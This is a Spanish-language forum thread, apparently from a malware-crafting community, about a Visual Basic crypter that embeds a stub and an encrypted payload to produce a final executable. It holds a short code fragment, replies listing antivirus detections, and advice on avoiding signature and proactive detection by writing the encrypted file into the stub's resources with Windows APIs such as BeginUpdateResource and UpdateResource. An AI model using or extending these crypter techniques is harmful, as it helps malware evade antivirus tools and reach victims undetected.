Código: Seleccionar todo

Dim Stub as String

Stub = StrConv(LoadResData(101, "CUSTOM"), vbUnicode)


Open ArchivoFinal For Binary As #1
Put #1, , Stub & "Delimitador" & ArchivoCryptado
Close #1
No lo había pensado, muy bueno.

Saludos.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Esta bueno el código, pero no entiendo como utilizarlo, alguien me puede explicar ? gracias...
Malware = 00011B
K7 escribió:Esta bueno el código, pero no entiendo como utilizarlo, alguien me puede explicar ? gracias...
agregas en el proyecto del builder el stub como recurso.. y en lugar de leer los datos del stub.exe desde (App.Path & "\stub.exe"), usas este código..
No, no se va ninguna firma, el stub es exactamente el mismo, las firmas se verían afectadas si almacenamos el fichero cifrado en recursos, pero no es el caso.

Saludos
UDTools.net
GitHub: https://github.com/MetalUDT
[Enlace externo eliminado para invitados]

20-febrero-2009

Jalar algo de recursos y usarlo directamente es detectado por proactiva... hablando de stub final.
Metal_Kingdom escribió:No, no se va ninguna firma, el stub es exactamente el mismo, las firmas se verían afectadas si almacenamos el fichero cifrado en recursos, pero no es el caso.

Saludos

Interesante metal, me acuerdo que tu subiste un crypter en delphi utilizando algo así o parecido, me puedes dar un manual de como hacer eso?
Malware = 00011B
Fácil..

Desde el builder necesitas usar unas cuantas apis: BeginUpdateResource, UpdateResource y EndUpdateResource.
Abres el stub desde el builder y escribes con esas apis el fichero cifrado en el recurso que crees.
Posteriormente el stub hace la lectura del recurso que contiene el fichero, se hace de la misma forma que indica el código inicial de este hilo, o por apis.
UDTools.net
GitHub: https://github.com/MetalUDT
Asi és , de la misma forma tambiem se puede hacer con FindResource , SizeofResource , LoadResource ...

Indetectables RAT v.0.9.5

@Indetectables Team
Responder

Volver a “Fuentes”